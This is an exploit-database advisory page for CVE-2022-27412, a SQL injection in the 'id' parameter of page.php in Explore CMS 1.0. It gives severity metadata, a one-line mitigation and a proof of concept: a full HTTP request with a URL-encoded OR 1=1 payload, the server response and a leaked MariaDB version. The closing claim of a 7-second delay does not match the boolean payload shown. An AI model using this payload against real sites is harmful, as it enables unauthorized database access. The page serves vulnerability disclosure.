Explore CMS 1.0 - SQL Injection

vendor:

Explore CMS

by:

Sajibe Kanti

9.8

CVSS

CRITICAL

SQL Injection

CWE

Product Name: Explore CMS

Affected Version From: 1

Affected Version To: 1

Patch Exists: YES

Related CWE: CVE-2022-27412

CPE: a:explore_it:explore_cms:1.0

Metasploit:

Other Scripts:

Platforms Tested:

2022

Explore CMS 1.0 – SQL Injection

SQL injection is a web security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. explore CMS is vulnerable to the SQL Injection in 'id' parameter of the 'page' page.

Mitigation:

Input validation, parameterized queries, and stored procedures can help mitigate SQL injection attacks.

Source

Exploit-DB raw data:

# Exploit Title: Explore CMS 1.0 - SQL Injection
# Date: 19/03/2022
# Exploit Author: Sajibe Kanti
# Vendor Name : EXPLORE IT
# Vendor Homepage: https://exploreit.com.bd
# CVE: CVE-2022-27412

# POC

# SQL Injection
SQL injection is a web security vulnerability that allows an attacker to interfere with the queries that an application makes to its database.
explore CMS is vulnerable to the SQL Injection in 'id' parameter of the 'page' page.

#Steps to reproduce

Following URL is vulnerable to SQL Injection in the 'id' field.

GET /page.php?id=1%27%20OR%201%3d1%20OR%20%27ns%27%3d%27ns HTTP/1.1
Host: REDACTED
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: PHPSESSID=b4c39f2ff3b9470f39bc088ab9ba9320
Referer: REDACTED
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36


HTTP/1.1 200 OK
content-encoding:
server: LiteSpeed
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
content-type: text/html; charset=UTF-8
transfer-encoding: chunked
date: Thu, 17 Mar 2022 07:27:21 GMT
vary: Accept-Encoding

10.3.34-MariaDB

Server accepts the payload and the response get delayed by 7 seconds.